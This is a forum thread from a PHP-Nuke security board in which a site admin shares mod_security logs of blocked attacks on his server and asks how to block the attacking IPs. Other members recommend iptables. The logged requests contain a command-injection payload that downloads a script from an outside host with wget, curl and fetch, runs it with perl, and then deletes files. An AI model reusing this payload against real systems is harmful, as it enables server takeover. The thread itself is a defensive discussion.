Ravens PHP Scripts: Forums
 

 

View next topic
View previous topic
Post new topic   Reply to topic    Ravens PHP Scripts And Web Hosting Forum Index -> Security - PHP Nuke
Author Message
phoenix-cms
Worker
Worker



Joined: Aug 05, 2005
Posts: 139

PostPosted: Tue Oct 25, 2005 7:00 pm Reply with quote

well since the .gif bug been out at current i have way over 200 ddos attacks on my server.

in mod security its showing the following.

Quote:
IP Date Time Handler GET Host Mod_Security-Message Mod_Security-Action
211.38.128.10 2005-10-24 02:59:10 (null) /ts2.5/inc/tell_a_friend.inc.php?script_root= [ Only registered users can see links on this board! Get registered or login! ]
cd%20/tmp;wget%20http://82.165.32.233/images/sess_3539283e27d73cae29fe2b80f9293f60;curl%20-
O%20http://82.165.32.233/images/sess_3539283e27d73cae29fe2b80f9293f60;fetch%20http://82.165.32.233/images/sess_3539
283e27d73cae29fe2b80f9293f60;perl%20sess_3539283e27d73cae29fe2b80f9293f60;rm%20-rf%20sess* HTTP/1.1 69.72.230.165
Access denied with code 406. Pattern match "wget " at THE_REQUEST. 406
211.38.128.10 2005-10-24 02:59:09 cgi-script /ts2.5/inc/tell_a_friend.inc.php?script_root= [ Only registered users can see links on this board! Get registered or login! ]
cd%20/tmp;wget%20http://82.165.32.233/images/sess_3539283e27d73cae29fe2b80f9293f60;curl%20-
O%20http://82.165.32.233/images/sess_3539283e27d73cae29fe2b80f9293f60;fetch%20http://82.165.32.233/images/sess_3539
283e27d73cae29fe2b80f9293f60;perl%20sess_3539283e27d73cae29fe2b80f9293f60;rm%20-rf%20sess* HTTP/1.1 69.72.230.166
Access denied with code 406. Pattern match "wget " at THE_REQUEST. 406
211.38.128.10 2005-10-24 02:59:09 (null) /ts2.5/inc/tell_a_friend.inc.php?script_root= [ Only registered users can see links on this board! Get registered or login! ]
cd%20/tmp;wget%20http://82.165.32.233/images/sess_3539283e27d73cae29fe2b80f9293f60;curl%20-
O%20http://82.165.32.233/images/sess_3539283e27d73cae29fe2b80f9293f60;fetch%20http://82.165.32.233/images/sess_3539
283e27d73cae29fe2b80f9293f60;perl%20sess_3539283e27d73cae29fe2b80f9293f60;rm%20-rf%20sess* HTTP/1.1 69.72.230.164
Access denied with code 406. Pattern match "wget " at THE_REQUEST. 406
211.38.128.10 2005-10-24 02:59:08 (null) /ts2.5/inc/tell_a_friend.inc.php?script_root= [ Only registered users can see links on this board! Get registered or login! ]
cd%20/tmp;wget%20http://82.165.32.233/images/sess_3539283e27d73cae29fe2b80f9293f60;curl%20-
O%20http://82.165.32.233/images/sess_3539283e27d73cae29fe2b80f9293f60;fetch%20http://82.165.32.233/images/sess_3539
283e27d73cae29fe2b80f9293f60;perl%20sess_3539283e27d73cae29fe2b80f9293f60;rm%20-rf%20sess* HTTP/1.1 69.72.230.163
Access denied with code 406. Pattern match "wget " at THE_REQUEST. 406
211.38.128.10 2005-10-24 02:59:08 (null) /ts2.5/inc/tell_a_friend.inc.php?script_root= [ Only registered users can see links on this board! Get registered or login! ]
cd%20/tmp;wget%20http://82.165.32.233/images/sess_3539283e27d73cae29fe2b80f9293f60;curl%20-
O%20http://82.165.32.233/images/sess_3539283e27d73cae29fe2b80f9293f60;fetch%20http://82.165.32.233/images/sess_3539
283e27d73cae29fe2b80f9293f60;perl%20sess_3539283e27d73cae29fe2b80f9293f60;rm%20-rf%20sess* HTTP/1.1 69.72.230.162
Access denied with code 406. Pattern match "wget " at THE_REQUEST. 406


i checkout one of the files where the gif bug is, here is what it is doing.
[ Only registered users can see links on this board! Get registered or login! ]

this is not my host but what they using need to find the client thats has this.

what would you suggest best way to block ips from server as atm i just adde the ips to htppdconf with denyall

thanks

steve

_________________
Evo 3.0 Developer & nukecops.com Admin
Image
coming soon [ Only registered users can see links on this board! Get registered or login! ] Smile 
View user's profile Send private message Send e-mail
Raven
Site Admin/Owner



Joined: Aug 27, 2002
Posts: 17088

PostPosted: Tue Oct 25, 2005 7:09 pm Reply with quote

iptables, of course!
 
View user's profile Send private message
phoenix-cms







PostPosted: Tue Oct 25, 2005 7:41 pm Reply with quote

apf ?
 
Raven







PostPosted: Tue Oct 25, 2005 7:53 pm Reply with quote

apf is just a front end to iptables.
 
evaders99
Former Moderator in Good Standing



Joined: Apr 30, 2004
Posts: 3221

PostPosted: Tue Oct 25, 2005 8:37 pm Reply with quote

So it looks like its attacking the file tell_a_friend.inc.php ?
What addon is that?

That IP seems to resolve to napalmrecords.at and s134442471.onlinehome.us

_________________
- Star Wars Rebellion Network -

Need help? Nuke Patched Core, Coding Services, Webmaster Services 
View user's profile Send private message Visit poster's website
phoenix-cms







PostPosted: Tue Oct 25, 2005 8:53 pm Reply with quote

this is what i blocked just today

Code:


4       130.123.128.117
1       137.190.165.11
1       165.21.154.11
1       165.21.154.14
2       201.250.101.164
2       202.152.170.209
3       202.152.172.1
1       202.156.6.60
1       202.190.134.138
1       202.80.176.90
1       202.81.48.136
1       203.162.3.147
1       203.87.81.6
1       210.187.51.62
2       210.87.17.1
1       211.25.50.10
1       211.26.76.96
1       213.58.84.205
2       218.111.64.94
3       219.95.219.13
1       222.152.148.218
6       222.255.127.10
4       4.244.39.213
1       60.48.103.223
1       60.48.82.126
1       62.1.60.197
1       62.194.4.132
1       64.81.35.182
1       65.26.241.119
1       66.142.142.174
1       67.101.135.24
3       67.187.84.253
148     68.100.196.243
iptables -I INPUT -p tcp --dport 80 -s 68.100.196.243 -j DROP
1       68.142.250.209
1       68.142.251.145
3       68.97.251.249
2       69.110.149.230
1       69.169.104.158
3       69.179.135.77
1       69.230.138.107
1       69.234.82.49
4       69.72.230.162
1       69.72.230.165
1       70.251.241.131
1       71.255.56.85
1       71.98.170.189
4       72.129.3.54
1       82.194.62.23


all the root hack attempts seems to starting to calm down now well unless they try something else Smile
 
Display posts from previous:       
Post new topic   Reply to topic    Ravens PHP Scripts And Web Hosting Forum Index -> Security - PHP Nuke

View next topic
View previous topic
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
You can attach files in this forum
You can download files in this forum


Powered by phpBB © 2001-2007 phpBB Group
All times are GMT - 6 Hours
 
Forums ©